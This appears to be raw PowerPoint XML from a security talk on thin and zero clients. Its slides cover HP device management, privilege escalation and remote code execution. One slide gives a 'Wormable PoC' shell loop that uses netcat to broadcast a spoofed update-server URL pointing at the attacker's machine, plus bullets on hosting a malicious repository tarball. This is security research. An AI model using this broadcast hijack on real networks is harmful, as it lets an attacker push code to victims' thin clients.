            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18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57567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DDCD1-ACAD-0849-9016-FBEE7F87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Hijack BROADCAST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053A5-BA8F-6749-9E32-A61A6293B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3639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#!/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sh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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Wormable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>PoC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(echo -n ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ServerURL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=http://’; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ifconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> eth0 | grep </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>inet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>| cut -d: -f2 | cut -d' ' -f1) &gt; spoof</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>while (true); do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nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ulw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 2 18286 &lt; spoof</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>done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5955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089B3-7AB2-804B-B54D-E6CC6EA48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48" y="5905095"/>
            <a:ext cx="38782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800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Adjacent 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Hijack broadcast</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Host a ”repo”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Include a custom </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tarball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8996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15D8-4711-8744-8728-378F0BA8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C895D-47EA-D64E-93B7-18BCCC2C6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80C8A-8E49-8D49-8484-701DC1A3B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48" y="5905095"/>
            <a:ext cx="38782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23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5DEE-13AC-0046-A5B5-F387960B6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Bugs bugs bugs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09A6C-90D3-164B-A27C-4811122FE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serious bugs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Lots of less serious bugs…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Here are some of the ones I didn’t have time to demo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8101068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B69D-50C5-134F-8A61-A6318AD09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factory reset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07C40C-7AEB-014A-94E6-B46B4661E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9702" y="1937702"/>
            <a:ext cx="9315461" cy="4080326"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5807082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D4D1D-35BF-BD40-B128-596D941DD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the password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6BF2E-99FD-7E47-A471-28F84DD88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 err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hptc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-get-new-password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A2D1D8-496E-BD45-BE5B-EDE4F99AE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1" t="5270" r="34805" b="37055"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="822434" y="633284"/>
            <a:ext cx="9905999" cy="6224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79F0C-03CB-FA48-9A52-F027B5E9C0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4" t="5239" r="49146" b="75874"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="466376" y="1775722"/>
            <a:ext cx="11256070" cy="306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5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6818-1CED-7C4D-B667-6F64639A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thin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92725-F66E-C84E-81E4-39F330DFF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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>organisations</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;1k thin client deployments</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Government</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Defense</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Finance</a:t>
            </a:r>
          </a:p>
          <a:p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053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F754F-5D7C-1345-ACCF-544C17C5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thin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56E3E-2F58-864A-96D9-222494572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Lacks oversight</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Time to patch latency</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Has common software problems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacker controlled thin client is effectively attacker controlled endpoint</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Network segregation important</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What about malicious insider?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8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48" y="5905095"/>
            <a:ext cx="38782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/>
          <a:srcRect b="7358"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6929851" y="348226"/>
            <a:ext cx="4117560" cy="5286577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/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Thanks for listening</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You’re awesome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7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C09746-AB97-954F-B689-902682808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950" y="381000"/>
            <a:ext cx="10195130" cy="5870766"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="86115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news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Heterogeneous network problems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Software has flaws</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Marketed as secure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Missing holistic view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078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3">
      <a:dk1>
        <a:srgbClr val="000000"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="3C9400"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="58FF4A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{BAC11388-DA32-8A4B-940D-E639A08D82E9}tf10001122</Template>
  <TotalTime>9171</TotalTime>
  <Words>1517</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>323</Paragraphs>
  <Slides>71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American Typewriter</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Trebuchet MS</vt:lpstr>
      <vt:lpstr>Tw Cen MT</vt:lpstr>
      <vt:lpstr>Circuit</vt:lpstr>
      <vt:lpstr>Zero clients</vt:lpstr>
      <vt:lpstr>Introduction</vt:lpstr>
      <vt:lpstr>WHOAMI</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>THIN / ZERO CLIENTS</vt:lpstr>
      <vt:lpstr>What are thin clients</vt:lpstr>
      <vt:lpstr>Who uses thin clients</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Old news</vt:lpstr>
      <vt:lpstr>Research</vt:lpstr>
      <vt:lpstr>Sources of information</vt:lpstr>
      <vt:lpstr>Other research</vt:lpstr>
      <vt:lpstr>Create a VM</vt:lpstr>
      <vt:lpstr>Design principles</vt:lpstr>
      <vt:lpstr>Base OS</vt:lpstr>
      <vt:lpstr>Operational MODES</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>patches/Updates</vt:lpstr>
      <vt:lpstr>patches/Updates</vt:lpstr>
      <vt:lpstr>Patches/Updates</vt:lpstr>
      <vt:lpstr>Thin client software</vt:lpstr>
      <vt:lpstr>Remote management</vt:lpstr>
      <vt:lpstr>Authentication</vt:lpstr>
      <vt:lpstr>Separation of privileges</vt:lpstr>
      <vt:lpstr>DEMO TIME</vt:lpstr>
      <vt:lpstr>Privilege escalation</vt:lpstr>
      <vt:lpstr>File system</vt:lpstr>
      <vt:lpstr>Write protection - Linux</vt:lpstr>
      <vt:lpstr>Write protection</vt:lpstr>
      <vt:lpstr>Write protection - Windows</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Snapshots</vt:lpstr>
      <vt:lpstr>Snapshots</vt:lpstr>
      <vt:lpstr>Persisting</vt:lpstr>
      <vt:lpstr>Persisting</vt:lpstr>
      <vt:lpstr>Manticore</vt:lpstr>
      <vt:lpstr>What is Manticore</vt:lpstr>
      <vt:lpstr>XML</vt:lpstr>
      <vt:lpstr>Encryption</vt:lpstr>
      <vt:lpstr>FILES</vt:lpstr>
      <vt:lpstr>mclient</vt:lpstr>
      <vt:lpstr>Encryption</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PWN?</vt:lpstr>
      <vt:lpstr>Configuration MANAGEMENT</vt:lpstr>
      <vt:lpstr>Lots of solutions</vt:lpstr>
      <vt:lpstr>EASY DEPLOY</vt:lpstr>
      <vt:lpstr>EASY DEPLOY – Known flaws</vt:lpstr>
      <vt:lpstr>EASY DEPLOY – NEW FLAWS</vt:lpstr>
      <vt:lpstr>DEMO TIME</vt:lpstr>
      <vt:lpstr>Remote Code execution</vt:lpstr>
      <vt:lpstr>FLEET MANAGEMENT</vt:lpstr>
      <vt:lpstr>HP Device management</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>HP Device management</vt:lpstr>
      <vt:lpstr>HP Device management</vt:lpstr>
      <vt:lpstr>AUTO UPDATE METHODS</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>REVERSE ENGINEERING BROADCAST</vt:lpstr>
      <vt:lpstr>Broadcast server</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Broadcast hijack.py</vt:lpstr>
      <vt:lpstr>Hijack BROADCAST</vt:lpstr>
      <vt:lpstr>DEMO TIME</vt:lpstr>
      <vt:lpstr>Adjacent RCE</vt:lpstr>
      <vt:lpstr>Conclusion</vt:lpstr>
      <vt:lpstr>More Bugs bugs bugs</vt:lpstr>
      <vt:lpstr>Block factory reset</vt:lpstr>
      <vt:lpstr>Social the password</vt:lpstr>
      <vt:lpstr>HP thin clients</vt:lpstr>
      <vt:lpstr>Questions?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clients</dc:title>
  <dc:creator>Eldar Marcussen</dc:creator>
  <cp:lastModifiedBy>Eldar Marcussen</cp:lastModifiedBy>
  <cp:revision>186</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-02-05T06:43:41Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-04-13T04:02:38Z</dcterms:modified>
</cp:coreProperties>
</file>